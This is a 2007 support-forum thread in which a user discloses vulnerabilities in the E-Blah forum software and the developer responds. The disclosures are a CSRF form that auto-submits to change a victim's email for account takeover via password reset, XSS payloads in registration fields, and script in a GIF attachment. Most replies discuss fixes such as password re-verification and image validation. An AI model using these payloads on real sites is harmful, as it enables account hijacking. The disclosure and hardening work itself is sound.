|
|
 d4rksn4k3 |
| September 20, 2007, 8:55am |
|
E-Blah Member  Posts: 4
Posts Per Day: 0.01
Time Online: 4 days 5 hours 27 minutes
|
|
Code
<form action="http://[sitevictim].it/forum/v-memberpanel/a-save/as-profile/s-contact/u-6064/" method="post" id="post" enctype="multipart/form-data">
<input type="text" name="email" value="[email@hacker].com" size="25" maxlength="80" />
<input type="text" name="icq" value="" maxlength="30" size="20" />
<input type="text" name="aim" value="" maxlength="30" />
<input type="text" name="yim" value="" maxlength="30" />
<input type="text" name="msn" value="" maxlength="40" />
<input type="text" name="skype" value="" maxlength="30" />
<input type="hidden" name="caller" value="1" />
<input type="submit" name="save" value=" Save " />
</form><script> document.body.onload = document.forms[0].submit(); </script> |
|
|
|
|
|
|
|
| Justin |
| September 20, 2007, 1:31pm |
|
|
Posts: 15,075
Gender:  Male
Posts Per Day: 6.52
Reputation: 93.40%
Reputation Score: +297 / -21
Time Online: 36 days 23 hours 27 minutes
Location: Tallassee, AL
Age: 22
|
|
|
|
|
|
| d4rksn4k3 |
| September 21, 2007, 2:40am |
|
E-Blah Member Posts: 4
Posts Per Day: 0.01
Time Online: 4 days 5 hours 27 minutes
|
the code makes to change the email to the user. the hacker it can use:
Forgot password
p.s. excused for pronounces it, are not English. |
|
|
|
|
|
| d4rksn4k3 |
| September 21, 2007, 3:12am |
|
E-Blah Member Posts: 4
Posts Per Day: 0.01
Time Online: 4 days 5 hours 27 minutes
|
Xss To Administration Panel
|
Code
var username:String = "\"><script>alert('XSS');</script>";
var email:String = "\"><script>alert('Double XSS');</script>";
var validemail:String = "";
var password:String = "";
var password:String = "";
var random:String = "";
var randomconfirm:String = "";
var agree:String "1";
var :String " Register "
geturl("http://[sitevictim]/[path].com/Blah.pl?v-register/p-2/", "_self", "POST"); |
|
|
Code
http://img215.imageshack.us/my.php?image=eblahxssgs4.jpg |
|
|
|
|
|
|
|
| d4rksn4k3 |
| September 21, 2007, 3:27am |
|
E-Blah Member Posts: 4
Posts Per Day: 0.01
Time Online: 4 days 5 hours 27 minutes
|
Xss to Attachment : File image.gif
|
Code
<script>alert('XSS');</script>
|
|
You open with Internet Explorer
 |
This post contains attachments; to download them you must login. |
|
|
|
|
|
|
|
| Justin |
| September 21, 2007, 10:41am |
|
|
Posts: 15,075
Gender: Male
Posts Per Day: 6.52
Reputation: 93.40%
Reputation Score: +297 / -21
Time Online: 36 days 23 hours 27 minutes
Location: Tallassee, AL
Age: 22
|
I'm still not sure I follow. This would work in IE only if the user actually clicks it (the code won't be executed on page). This is a problem with IE's handing of these files. The content-type is not sent as HTML or JavaScript. Firefox doesn't execute it because it's supposed to be an image, not code.
The first code, I'm aware that you can do that and then go to "Forget Password", but my point was that the code would have to be placed on a foreign website. Any attached HTML files are changed to .txt files so they can't be run as webpages.
The registration page that you see in the Admin Center would not be what any hacker would be able to see because the registration page checks to see if you are an Administrator. So that one wouldn't work. |
| I do installs for $25 and upgrades for $20.Technical support is always free.  Donate to E-Blah! My Websites: Revolution Reality (My Blog) | MinistryTalk.com | Portfolio"But you, O Lord, are a compassionate and gracious God, slow to anger, abounding in love and faithfulness." — Psalm 86:15 NIV  |
|
|
|
|
|
| Vzx |
| September 22, 2007, 7:23am |
|
|
Posts: 33
Gender: Male
Posts Per Day: 0.03
Reputation: 100.00%
Reputation Score: +2 / -0
Time Online: 1 days 24 minutes
Location: Russia
|
I think exploit for Admin panel is not noteworthy. But two other issues are interesting... Though javascript as an image is not problem of E-Blah, it's somewhat dangerous. I think the easiest way is to check an attached images by means of some image library with the purpose of getting image type and its resolution, and if these parameters are not valid, then the image is "bad". The first code is interesting too... Bad guy can put the link onto his website at the forum and insert a list of actual ID's/username in iframe, for example. So when you'll follow the link, your e-mail address in profile will really change.  I think it's necessary to add some verification in the member panel. For example, to ask password before any changes in such significant information as an e-mail address. |
|
|
|
|
|
| Justin |
| September 22, 2007, 9:20am |
|
|
Posts: 15,075
Gender: Male
Posts Per Day: 6.52
Reputation: 93.40%
Reputation Score: +297 / -21
Time Online: 36 days 23 hours 27 minutes
Location: Tallassee, AL
Age: 22
|
I think it's necessary to add some verification in the member panel. For example, to ask password before any changes in such significant information as an e-mail address.
That's a great idea, that can be added to the Administrator password validation stuff. I'll work on it for a few minutes and see what I can come up with.  |
| I do installs for $25 and upgrades for $20.Technical support is always free. Donate to E-Blah! My Websites: Revolution Reality (My Blog) | MinistryTalk.com | Portfolio"But you, O Lord, are a compassionate and gracious God, slow to anger, abounding in love and faithfulness." — Psalm 86:15 NIV |
|
|
|
|
|
| Vzx |
| September 22, 2007, 10:38am |
|
|
Posts: 33
Gender: Male
Posts Per Day: 0.03
Reputation: 100.00%
Reputation Score: +2 / -0
Time Online: 1 days 24 minutes
Location: Russia
|
Justin, thank you! We'll waiting for news from you! And what do you think about an issue with images in Internet Explorer? There are many solutions in Perl for quick grabbing of information about the images (resolution, type of image, etc.) in Internet.. d4rksn4k3, thank you for interesting research! |
|
|
|
|
|
| Justin |
| September 22, 2007, 11:10am |
|
|
Posts: 15,075
Gender: Male
Posts Per Day: 6.52
Reputation: 93.40%
Reputation Score: +297 / -21
Time Online: 36 days 23 hours 27 minutes
Location: Tallassee, AL
Age: 22
|
I've enabled it. I hope this isn't too much of a nuisance, but it will help to better protect forums. Only administrators will get the password verification. The verification will be JUST like the main verification that is used to access other areas, only this one will be a "one use" verification and will expire one hour after it has been submitted. Only Administrator accounts will need to be verified for e-mail and password changes. This means that anyone normal user will not need to verify their password, nor will Administrators need to validate their passwords if they are editing regular users. However, if the administrator options is being edited, administrators will always need to validate. This can be expanded to include other areas, so feel free to give me ideas about other areas. It will be online tonight on the nightly site. Please test it and let me know if there's anything that can be done to improve it. |
| I do installs for $25 and upgrades for $20.Technical support is always free. Donate to E-Blah! My Websites: Revolution Reality (My Blog) | MinistryTalk.com | Portfolio"But you, O Lord, are a compassionate and gracious God, slow to anger, abounding in love and faithfulness." — Psalm 86:15 NIV |
|
|
|
|
|
| Justin |
| September 22, 2007, 11:12am |
|
|
Posts: 15,075
Gender: Male
Posts Per Day: 6.52
Reputation: 93.40%
Reputation Score: +297 / -21
Time Online: 36 days 23 hours 27 minutes
Location: Tallassee, AL
Age: 22
|
And what do you think about an issue with images in Internet Explorer? There are many solutions in Perl for quick grabbing of information about the images (resolution, type of image, etc.) in Internet.
Not all users have GD or ImageMagik, that's why I'm not adding that. Plus, there are times when GD can't get the dimensions correct. It's a good idea though. |
| I do installs for $25 and upgrades for $20.Technical support is always free. Donate to E-Blah! My Websites: Revolution Reality (My Blog) | MinistryTalk.com | Portfolio"But you, O Lord, are a compassionate and gracious God, slow to anger, abounding in love and faithfulness." — Psalm 86:15 NIV |
|
|
|
|
|
| Vzx |
| September 22, 2007, 12:42pm |
|
|
Posts: 33
Gender: Male
Posts Per Day: 0.03
Reputation: 100.00%
Reputation Score: +2 / -0
Time Online: 1 days 24 minutes
Location: Russia
|
Not all users have GD or ImageMagik, that's why I'm not adding that.
I think this function must be available in Admin panel as option. If user has GD/ImageMagik, he'll be able to activate this function at own discretion to increase security on the forum.. And I saw a few simple modules for determination of the resolution of an usual types of images, I'll test them as far as possible. Nevertheless, I think GD or ImageMagik are better for these purposes... |
|
|
|
|
|
| Vzx |
| September 22, 2007, 12:55pm |
|
|
Posts: 33
Gender: Male
Posts Per Day: 0.03
Reputation: 100.00%
Reputation Score: +2 / -0
Time Online: 1 days 24 minutes
Location: Russia
|
Only Administrator accounts will need to be verified for e-mail and password changes. This means that anyone normal user will not need to verify their password, nor will Administrators need to validate their passwords if they are editing regular users
Justin, please, could you extend this verification option over all regular users too? Some users on my forums have thousands of messages, their accounts are more important than even admin accounts...  |
|
|
|
|
|
| Vzx |
| September 22, 2007, 1:24pm |
|
|
Posts: 33
Gender: Male
Posts Per Day: 0.03
Reputation: 100.00%
Reputation Score: +2 / -0
Time Online: 1 days 24 minutes
Location: Russia
|
The verification ... will expire one hour after it has been submitted.
Is there any way to decrease this period? It's a very long in my opinion.. 10 minutes are more than enough.
This can be expanded to include other areas
How do you think, maybe it's better to protect member center completely? For example, bad guys may use signature field in an effort to publish short "detractive" material in all messages of the user..
Please test it and let me know if there's anything that can be done to improve it.
Thanks! We'll see |
|
|
|
|
|
| Justin |
| September 22, 2007, 2:01pm |
|
|
Posts: 15,075
Gender: Male
Posts Per Day: 6.52
Reputation: 93.40%
Reputation Score: +297 / -21
Time Online: 36 days 23 hours 27 minutes
Location: Tallassee, AL
Age: 22
|
Well, the user would have to have their verification ID (it's in the URL) along with the verification ID inside their member id for it to be effective, so one hour isn't that bad, I don't think. I was thinking of expanding it to other Admin Center areas.
If it gets too crazy, people wouldn't like it though. It's really annoying having to validate a lot. |
| I do installs for $25 and upgrades for $20.Technical support is always free. Donate to E-Blah! My Websites: Revolution Reality (My Blog) | MinistryTalk.com | Portfolio"But you, O Lord, are a compassionate and gracious God, slow to anger, abounding in love and faithfulness." — Psalm 86:15 NIV |
|
|
|
|
|
|
Home
Features
Download
Demo
Support
Community
Home
Calendar
Search
Register
Login
Welcome to the E-Blah Community!
Report to Moderator
Logged
Private message
Site
ICQ
